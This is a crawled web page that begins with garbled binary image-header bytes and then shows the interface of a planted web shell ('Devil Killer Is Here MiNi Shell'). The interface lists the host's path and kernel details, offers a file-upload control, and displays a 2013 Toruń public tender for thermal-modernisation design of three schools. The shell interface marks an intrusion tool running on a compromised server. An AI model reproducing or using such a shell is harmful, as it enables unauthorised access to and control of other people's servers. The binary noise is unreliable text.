JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130424/62075-N-2013.html

<p class="kh_header"><b>Toruń: Wykonanie dokumentacji projektowych :
 Część 1 - Docieplenie - kompleksowa termomodernizacja Zespołu Szkół nr 24  przy  ul. Ogrodowej 3/5 w Toruniu, Część 2 - Docieplenie - kompleksowa termomodernizacja budynku Zespołu Szkół nr 31 przy ul. Dziewulskiego 41 B w Toruniu ,Część 3 - Docieplenie - kompleksowa termomodernizacja budynku Zespołu Szkół nr 6  przy ul. Dziewulskiego 41 C w Toruniu</b><br>
<b>Numer ogłoszenia: 62075 - 2013; data zamieszczenia: 24.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Toruń reprezentowana przez Prezydenta Miasta Torunia , ul. Wały gen. Sikorskiego 8, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6118713, faks 056 6118622.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> um.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowych :
 Część 1 - Docieplenie - kompleksowa termomodernizacja Zespołu Szkół nr 24  przy  ul. Ogrodowej 3/5 w Toruniu, Część 2 - Docieplenie - kompleksowa termomodernizacja budynku Zespołu Szkół nr 31 przy ul. Dziewulskiego 41 B w Toruniu ,Część 3 - Docieplenie - kompleksowa termomodernizacja budynku Zespołu Szkół nr 6  przy ul. Dziewulskiego 41 C w Toruniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowych :
Część 1-Docieplenie-kompleksowa termomodernizacja Zespołu Szkół nr 24  przy  ul. Ogrodowej 3/5 w Toruniu,
Część 2-Docieplenie-kompleksowa termomodernizacja budynku Zespołu Szkół nr 31 przy ul. Dziewulskiego 41 B w Toruniu ,
Część 3-Docieplenie - kompleksowa termomodernizacja budynku Zespołu Szkół nr 6  przy ul. Dziewulskiego 41 C w Toruniu
Zakres dokumentacji projektowej obejmuje:     
1) Docieplenie - kompleksowa termomodernizacja Zespołu Szkół nr 24  przy  ul. Ogrodowej 3/5 w Toruniu:
-docieplenie ścian zewnętrznych metodą lekką - mokrą łącznie z dociepleniem ścian  fundamentowych do poziomu ław, w tym rozbiórka blach trapezowych,
-docieplenie stropodachu wentylowanego granulatem z wełny mineralnej (z jednokrotnym  kryciem papą zgrzewalną),
-docieplenie stropodachu niewentylowanego od zewnątrz łącznie z dwukrotnym kryciem  dachu papą zgrzewalną, 
-dostosowanie grubości warstw ocieplenia do parametrów przyjętych w audycie energetycznym,
-izolacja przeciwwilgociowa ścian zewnętrznych do poziomu fundamentów,  
-naprawa i remont naświetli okiennych,
-obróbki blacharskie, rynny i rury spustowe do wymiany lub remontu, 
-stolarka okienna i drzwiowa zewnętrzna do częściowej wymiany łącznie ze  zmniejszeniem powierzchni  ściany fasadowej basenu i montażem nowych okien,
-zmniejszenie powierzchni okien klatki schodowej budynku,
-rozebranie luxferów i w ich miejsce wstawienie okien o mniejszej powierzchni, pozostała część do zamurowania,
-filarki okienne i lekkie wypełnienia ścian do naprawy lub wymiany, 
-wymianę lub remont instalacji odgromowej, naprawę krat okiennych lub wymianę na rolety antywłamaniowe,
-modernizację lub przebudowę wejść do budynku w uzgodnieniu z Zamawiających (daszek, schody, balustrady), w tym przystosowanie wejścia głównego dla osób niepełnosprawnych (podjazd),  
-wykonanie nowej opaski wokół budynków lub odtworzenie nawierzchni w sąsiedztwie obiektu,
-remont placu przed wejściem głównym szkoły,
-wentylację mechaniczną kuchni (wraz z demontażem istniejącej wentylacji i wymianą instalacji zasilania nagrzewnic),
-wymianę instalacji c.o. z podziałem na obwody grzewcze umożliwiające niezależne sterowanie (z wykorzystaniem istniejących grzejników żeliwnych) z wyłączeniem instalacji grzewczej dużej sali gimnastycznej, regulacja hydrauliczna wszystkich istniejących i projektowanych obwodów grzewczych łącznie z salą gimnastyczną,
-zaprojektowanie lub przełożenie oświetlenia i monitoringu na budynku, 
-instalację elektryczną podgrzewu rynien,
-ustalenie nowej wartości mocy zamówionej dla dostawcy ciepła, 
-projekt wykonać na podstawie warunków technicznych oraz podlega on uzgodnieniu z dostawcą ciepła firmą EDF,
-docieplenia nie obejmują sal gimnastycznych, poza wzmocnieniem siatką warstwy fakturowej dolnej części ścian, naprawy uszkodzeń i malowania ścian.
(Obiekt jest złożony z części pierwotnej tradycyjnej oraz części dobudowanych w technologii wielkopłytowej prefabrykowanej, częściowo podpiwniczony. Złożony jest z kilku segmentów: budynku głównego, dydaktycznego, tzw.AKŻ oraz basenu i dwóch sal gimnastycznych. Kubatura budynków ok. 38 000 m3, powierzchnia użytkowa pomieszczeń ok.8 800 m2.)
2) Docieplenie - kompleksowa termomodernizacja budynku Zespołu Szkół nr 31 przy ul. Dziewulskiego 41 B w Toruniu:
-docieplenie ścian zewnętrznych metodą lekką - mokrą (włącznie z dociepleniem ścian piwnic do poziomu fundamentów),
-docieplenie stropodachu wentylowanego granulatem z wełny mineralnej (z jednokrotnym kryciem papą zgrzewalną),
-docieplenie stropodachu niewentylowanego od zewnątrz łącznie z dwukrotnym kryciem dachu papą zgrzewalną,
-izolacja przeciwwilgociowa ścian zewnętrznych do poziomu fundamentów,
-obróbki blacharskie, rynny i rury spustowe do wymiany lub remontu, usunięcie ze ścian płyt trapezowych z blachy,
-montaż okien i drzwi zewnętrznych do tej pory nie wymienionych,
-zmniejszenie powierzchni okien w sali gimnastycznej i w łączniku, 
-naprawa i konserwacja krat w oknach lub wymiana na rolety antywłamaniowe,
-naprawa lub wymiana filarków okiennych,
-instalację odgromową do sprawdzenia - do wymiany lub naprawy,
-modernizację wejść do budynku (wymiana daszków nad wejściami, naprawa schodów,balustrady do remontu lub wymiany), zadaszyć wszystkie istniejące wejścia,
-przebudowa wejścia przy sali gimnastycznej- zmniejszenie zadaszenia i powierzchni oszklonej łącznie z drzwiami zewnętrznymi,
-wykonanie nowej opaski wokół budynków lub odtworzenie nawierzchni w sąsiedztwie obiektów,
-wymianę wewnętrznej instalacji centralnego ogrzewania (z wykorzystaniem istniejących grzejników żeliwnych),modernizacja lub regulacja węzła cieplnego w zakresie związanym z wewnętrzną instalacją grzewczą. W zakresie instalacji c.o sali gimnastycznej wymiana instalacji c.o.na instalację c.o. dyżurną grzejnikową oraz instalację grzewczą z wykorzystaniem nagrzewnic wodnych z wentylatorem nadmuchowym oraz kompletną automatyką sterującą. Nagrzewnice zabezpieczyć przed uderzeniami np. piłką,
-przełożenie monitoringu i oświetlenia na ścianach,  
-instalację elektryczną podgrzewu koszy odpływowych (wpustów dachowych),
-instalację elektryczną zasilającą nagrzewnice  wentylacyjne,
-ustalenie nowej wartości mocy zamówionej dla dostawcy ciepła, 
-projekt wykonać na podstawie warunków technicznych oraz podlega on uzgodnieniu z dostawcą ciepła firmą EDF.
(Obiekt jest typowym obiektem szkolnym o konstrukcji wielkopłytowej prefabrykowanej złożony z 5 budynków połączonych łącznikami, podpiwniczonym o kubaturze 44 673 m3,i powierzchni użytkowej 10 463,4 m2.)
3) Docieplenie - kompleksowa termomodernizacja budynku Zespołu Szkół nr 6  przy ul. Dziewulskiego 41 C w Toruniu:
-docieplenie ścian zewnętrznych metodą lekką-mokrą (włącznie ze ścianami fundamentowymi), 
-izolację przeciwwilgociową ścian poniżej gruntu do poziomu fundamentów,
-docieplenie stropodachu wentylowanego granulatem z wełny mineralnej (z jednokrotnym kryciem papą zgrzewalną), 
-docieplenie stropodachu niewentylowanego od zewnątrz łącznie z dwukrotnym kryciem dachu papą zgrzewalną,  
-wymianę parapetów i obróbek blacharskich,wymianę lub naprawę rynien i rur spustowych,
-przeprojektowanie odwodnienia dachu części administracyjno-dydaktycznej - nowy system rynnowy,
-remont instalacji deszczowej od zewnątrz budynku głównego i garaży(strona południowa obiektu), z instalacją rewizji na rurach spustowych oraz remontem przyłączy deszczowych od budynku do instalacji zewnętrznej (studni),
-część stolarki okiennej i drzwiowej zewnętrznej do wymiany,zmniejszenie ilości okien w łączniku,
-kraty okienne do remontu, usunięcia lub wymianę na rolety antywłamaniowe,
-wymianę lub naprawę instalacji odgromowej,
-przebudowanie wejścia głównego z dostosowaniem dla osób niepełnosprawnych, likwidację  wejścia przy łączniku,
-remont lub przebudowa pozostałych wejść do budynku (schody, balustrady, daszki),
-rozważenie możliwości likwidacji daszków nad wejściami w części dydaktycznej i  zastąpienie ich lekkimi z poliwęglanu,
-część garażową i wiaty do odnowienia, część skrajna w stanie surowym do rozbiórki,
-wykonanie nowej opaski wokół budynków lub odtworzenie nawierzchni w sąsiedztwie obiektów,
-remont placu betonowego przy wjeździe na dziedziniec szkoły,
-regulację wewnętrznej instalacji centralnego ogrzewania z nowym bilansem zapotrzebowania ciepła wynikającym z wykonanego docieplenia, ewentualna modernizacja węzła cieplnego w  zakresie przynależnym do wewnętrznej instalacji c.o. Projekt wykonać na podstawie warunków technicznych oraz podlega on uzgodnieniu z dostawcą ciepła firmą EDF,
-przełożenie monitoringu, oświetlenia na ścianach,
-instalację elektryczną podgrzewu rynien, 
-ustalenie nowej wartości mocy zamówionej dla dostawcy ciepła, 
Uwaga:sala gimnastyczna z przedszkolem była docieplana, sprawdzić stan pokrycia z blachy trapezowej, docieplenie stropodachu, okna sali gimnastycznej przewidziane są do wymiany.  
(Obiekt szkoły jest złożony z czterech budynków połączonych łącznikami oraz portierni i części gospodarczo-garażowej. Łączna kubatura ok. 17 200 m3, powierzchni użytkowa ok.3110 m2,nie licząc części gospodarczej i garażowej.)
Wykaz opracowań wchodzących w skład przedmiotu zamówienia (odrębnie dla poszczególnej części dokumentacji projektowej):  
1)wielobranżowy projekt budowlany zawierający wszystkie elementy projektu wykonawczego, w tym informację dotyczącą bezpieczeństwa i ochrony zdrowia, w tym:  
- projekt instalacji elektrycznej podgrzewu rynien,
2)specyfikacja techniczna wykonania i odbioru robót budowlanych (wszystkie branże)+ wersja elektroniczna (format pdf),
3)kosztorys inwestorski+wersja elektroniczna (format pdf i ath),
4)przedmiar robót+wersja elektroniczna (format pdf i ath),
5)zbiorcze zestawienie kosztów inwestycji (ZZK), w tym wynikające z:  kosztorysów inwestorskich,kosztów wykonania dokumentacji projektowej,  nadzorów  inwestorskich i autorskich,wynikających z umów przyłączeniowych i innych,
6)inne opracowania niezbędne do uzyskania pozwolenia na użytkowanie obiektu,
7)dokumentacja projektowa także w wersji elektronicznej w formacie pdf  i  dwg.
Przedmiot zamówienia obejmuje ponadto (odrębnie dla poszczególnego części dokumentacji projektowej):  
1)wykonanie mapy syt.-wys. w skali 1:500 (w razie potrzeby wymagana aktualizacja do celów projektowych),  
2)wykonanie mapy stanu prawnego terenu objętego projektowaną inwestycją, z aktualnymi adresami właścicieli i władających nieruchomościami, 
3)uzyskanie warunków technicznych od właściwych instytucji eksploatujących sieci (na podstawie przygotowanych przez Wykonawcę stosownych kompletnych wniosków z wymaganymi załącznikami do podpisu przez Zamawiającego), 
4)przygotowanie dokumentów do wystąpienia przez Zamawiającego o wymagane decyzje administracyjne,w tym decyzję o pozwoleniu na budowę/lub, gdy pozwolenie na budowę nie jest wymagane - do zgłoszenia zamiaru rozpoczęcia robót budowlanych  (przygotowane przez Wykonawcę stosowne kompletne wnioski z wymaganymi załącznikami do podpisu przez Zamawiającego),
5)przeniesienie na Zamawiającego praw autorskich majątkowych do wykonanej dokumentacji projektowej w zakresie objętym umową,
6)sprawowanie przez Wykonawcę nadzoru autorskiego podczas realizacji inwestycji na podstawie dokumentacji projektowej objętej przedmiotem zamówienia.  
Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi w tym zakresie przepisami, warunkami technicznymi i normami,na podstawie oględzin terenu inwestycji.
Opracowany przedmiot zamówienia powinien w szczególności:
1)spełniać wszystkie warunki określone w ustawie Prawo zamówień publicznych (Dz.U. z 2010 r.Nr 113,poz. 759,z późn.zm.),art. 34 ustawy z dnia 7 lipca 1994 r.- Prawo budowlane (tekst jednolity: Dz.U.z 2010 r.Nr 243, poz. 1623, z późn.zm.), rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. Nr 120, poz. 1133, z późn.zm.), rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. nr 202, poz. 2072, z późn. zm.), rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r.w sprawie określenia metod  i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. nr 130, poz. 1389) oraz ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz.717,z późn. zm.), z tym, że do opracowania kosztorysu inwestorskiego Wykonawca stosować będzie ceny jednostkowe robót określone na podstawie danych rynku lokalnego oraz czynniki cenotwórcze określone w aktualnej w okresie sporządzania informacji w systemie Sekocenbud; wszelkie materiały, urządzenia lub produkty wskazane w dokumentacji projektowej muszą być opisane poprzez podanie odpowiednich granicznych parametrów, cech technicznych, jakościowych nawet w przypadku uprawnionego posługiwania się określeniem >>lub równoważny<<, nazwy własne materiałów, urządzeń lub produktów mogą być stosowane jedynie pomocniczo w przypadku dopuszczenia materiałów, urządzeń lub produktów równoważnych, 
2)posiadać komplet uzgodnień i pozwoleń wymaganych przepisami szczególnymi,w tym uzgodnienie z użytkownikiem całości zaprojektowanych rozwiązań oraz uzgodnienie monitoringu z Wydziałem Ochrony Ludności Urzędu Miasta Torunia,   
3)zawierać niezbędne opinie, oceny, badania, ekspertyzy, rozwiązania ewentualnych kolizji,i inne niezbędne do prawidłowej realizacji prac projektowych i zapewniać możliwość wykonania robót i oddania obiektu do użytkowania.
Materiałem wyjściowym do realizacji przedmiotu zamówienia jest dokumentacja umieszczona w załącznikach do SIWZ. Dla realizacji przedmiotu umowy Wykonawca winien wykonać wielobranżową inwentaryzację budowlaną do celów projektowych. Do wszystkich robót objętych przedmiotem umowy należy stosować materiały o standardzie właściwym do tego typu obiektów.  Zakres opracowania określono na podstawie wizji lokalnej, informacji uzyskanych od użytkownika i Wydziału Edukacji Urzędu Miasta Torunia oraz dokumentacji archiwalnej.   
Wykonawca oświadcza, że wskazane w dokumentacji projektowej cechy techniczne i jakościowe materiałów, urządzeń i produktów stanowią kryterium równoważności, tzn. realizator robót ma prawo do zastępowania ich materiałami, urządzeniami i produktami niegorszymi przy zachowaniu równorzędnych parametrów jakościowych i technicznych.
Do obowiązków Wykonawcy należy też weryfikacja wszystkich otrzymanych materiałów, dokonanie wizji w terenie oraz ewentualne uzupełnienie w zakresie wymaganym do wykonania przedmiotu zamówienia.  
Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
Zamawiający dopuszcza możliwości składania ofert częściowych z podziałem na:
Część 1-Docieplenie - kompleksowa termomodernizacja Zespołu Szkół nr24  przy  ul. Ogrodowej 3/5 w Toruniu,
Część 2-Docieplenie - kompleksowa termomodernizacja budynku Zespołu Szkół nr 31 przy ul.Dziewulskiego 41 B w Toruniu ,
Część 3-Docieplenie - kompleksowa termomodernizacja budynku Zespołu Szkół nr 6  przy ul.Dziewulskiego 41 C w Toruniu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających (art. 67 ust. 1 pkt. 6 PZP) stanowiących nie więcej niż 50% wartości zamówienia podstawowego i dotyczącego przedmiotu zamówienia-prac określonych w punkcie 1 SIWZ.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 1500 zł (słownie: tysiąc pięćset złotych 00/100)-całość ( cz.1,2,3)
Wadium część1-500 zł, Wadium część 2-500 zł, Wadium część 3-500 zł
Wadium powinno być wniesione przed upływem terminu składania ofert.Okres ważności wadium powinien być zgodny z terminem związania ofertą.
Wadium może być wniesione w następujących formach;
a) pieniądzu - na konto UMT nr 67 1160 2202 0000 0000 6171 9146 z adnotacją Wadium -
26/2013 -Przetarg nieograniczony na wykonanie dokumentacji projektowych : Część 1-Docieplenie-kompleksowa termomodernizacja Zespołu Szkół nr 24  przy ul.Ogrodowej 3/5 w Toruniu, Część 2-Docieplenie-kompleksowa termomodernizacja budynku Zespołu Szkół nr 31 przy ul.Dziewulskiego 41 B w Toruniu ,Część 3-Docieplenie-kompleksowa termomodernizacja budynku Zespołu Szkół nr 6 przy ul. Dziewulskiego 41 C w Toruniu
Za datę wniesienia wadium przyjmuję się datę jego wpływu na konto zamawiającego.
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty,o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie stawia szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony gdy Wykonawca zrealizował w w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
co najmniej 2 usługi wartością i zakresem odpowiadającym przedmiotowi zamówienia i obejmującym swym zakresem obiekty kubaturowe - o wartości nie mniejszej niż 40.000,00zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie stawia szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony gdy osoby, którymi dysponuje wykonawca i które będą uczestniczyć w wykonaniu zamówienia muszą posiadać uprawnienia budowlane do projektowania stosownie do powierzonych czynności w specjalności: architektonicznej, konstrukcyjno - budowlanej, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,  wodociągowych i kanalizacyjnych, - w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie stawia szczegółowych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

